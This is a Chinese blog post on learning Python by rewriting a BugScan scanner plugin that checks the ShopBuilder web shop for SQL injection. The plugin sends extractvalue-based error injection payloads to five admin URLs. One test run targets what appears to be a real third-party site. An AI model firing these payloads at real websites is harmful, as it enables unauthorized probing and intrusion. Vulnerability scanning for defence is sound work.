bugscan编写之python学习

发布时间:April 26, 2015 // 分类:代码学习,python // No Comments

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#refer :http://www.wooyun.org/bugs/wooyun-2014-070316
#refer :http://www.wooyun.org/bugs/wooyun-2014-063225
 
def assign(service, arg):
    if service == "shopbuilder":
        return True, arg
 
def audit(arg):
    url1 = arg + '?m=vote/admin&s=vote&vid=11%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))'
    url2 = arg + '?m=vote/admin&s=vote_list&did=11%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))'
    url3 = arg + '?m=news/admin&s=news&newsid=extractvalue(1,concat(0x3a,md5(3.14),0x3a))'
    url4 = arg + '?m=news/admin&s=newslist&did=1%29%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))%23'
    url5 = arg + '?m=news/admin&s=newslist&nclass=1&chk[]=1%29%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))%23'
    code1, head1, res1, errcode1,finalurl1 =  curl.curl(url1)
    code2, head2, res2, errcode2,finalurl2 =  curl.curl(url2)
    code3, head3, res3, errcode3,finalurl3 =  curl.curl(url3)
    code4, head4, res4, errcode2,finalurl4 =  curl.curl(url4)
    code5, head5, res5, errcode5,finalurl5 =  curl.curl(url5)
    if code1 == 200 or code2 == 200 or code3 ==200 or code4 == 200 or code5 == 200:
        if "4beed3b9c4a886067de0e3a094246f7" in res1 or "4beed3b9c4a886067de0e3a094246f7" in res2 or "4beed3b9c4a886067de0e3a094246f7" in res3 or "4beed3b9c4a886067de0e3a094246f7" in res4 or "4beed3b9c4a886067de0e3a094246f7" in res5:
            security_hole('find sql injection: ' + arg+ '?m=vote/admin')
 
if __name__ == '__main__':
    from dummy import *
    audit(assign('shopbuilder', 'http://www.exploit.com/')[1])

自己看起来都惨不忍睹,后来xx提议使用一个for循环吧。再使用break跳出来就好了。自己查询了下,就弄了一个出来

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#from : http://www.wooyun.org/bugs/wooyun-2014-067081
 
def assign(service, arg):
    if service == "shopbuilder":
        return True, arg
 
def audit(arg):
    payload=['?m=vote/admin&s=vote&vid=11%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))',
    '?m=vote/admin&s=vote_list&did=11%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))',
    '?m=news/admin&s=news&newsid=extractvalue(1,concat(0x3a,md5(3.14),0x3a))',
    '?m=news/admin&s=newslist&did=1%29%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))%23',
    '?m=news/admin&s=newslist&nclass=1&chk[]=1%29%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))%23',
             ] #全部写进一个数组
    for i in range(len(payload)): #先获取整个数组的长度
        url = arg + payload[i]
        code, head, res, errcode,finalurl =  curl.curl(url)
        if code == 200 and "4beed3b9c4a886067de0e3a094246f7" in res: #如果满足整个条件
            security_hole('find sql injection: ' + url) #输出结果
            break #跳出循环
             
         
if __name__ == '__main__':
    from dummy import *
    audit(assign('shopbuilder', 'http://www.zgzyjczs.com/')[1])

后来看到某牛评论说是

循环读取没必要使用元组下标,直接从元组里循环就行

for payload in payloads:
    url = arg + payload
    code, head, res, errcode,finalurl =  curl.curl(url)
    ……

循环如果完了以后其实没必要有break的,而且你这属于多个payload挨个监测,其实让他检测完才是最好的情况

所以,最后的exploit是这个样子了

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#from : http://www.wooyun.org/bugs/wooyun-2014-067081
 
def assign(service, arg):
    if service == "shopbuilder":
        return True, arg
 
def audit(arg):
    payloads=('?m=vote/admin&s=vote&vid=11%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))',
    '?m=vote/admin&s=vote_list&did=11%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))',
    '?m=news/admin&s=news&newsid=extractvalue(1,concat(0x3a,md5(3.14),0x3a))',
    '?m=news/admin&s=newslist&did=1%29%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))%23',
    '?m=news/admin&s=newslist&nclass=1&chk[]=1%29%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))%23',
             )
    for payload in payloads:
        url = arg + payload
        code, head, res, errcode,finalurl =  curl.curl(url)
        if code == 200 and "4beed3b9c4a886067de0e3a094246f7" in res:
            security_hole(url)
         
if __name__ == '__main__':
    from dummy import *
    audit(assign('shopbuilder','http://www.example.com/')[1])

 

标签:bugscan, python

添加新评论 »

分类
最新文章
最近回复
  • 没穿底裤: 最近发现的新版本可以装在LINUX了。但是API有点变化
  • 没穿底裤: 暂时好像没有看到这个功能.
  • 没穿底裤: 这个只是一个分析,并不是使用方法哟
  • 没穿底裤: 抱歉,很久没有打理了。会不会你使用的是12版本。目前还没有遇到过这种情况
  • bao song: http://0cx.cc/php_decode_shell.jspx 这个怎么用,代码提示...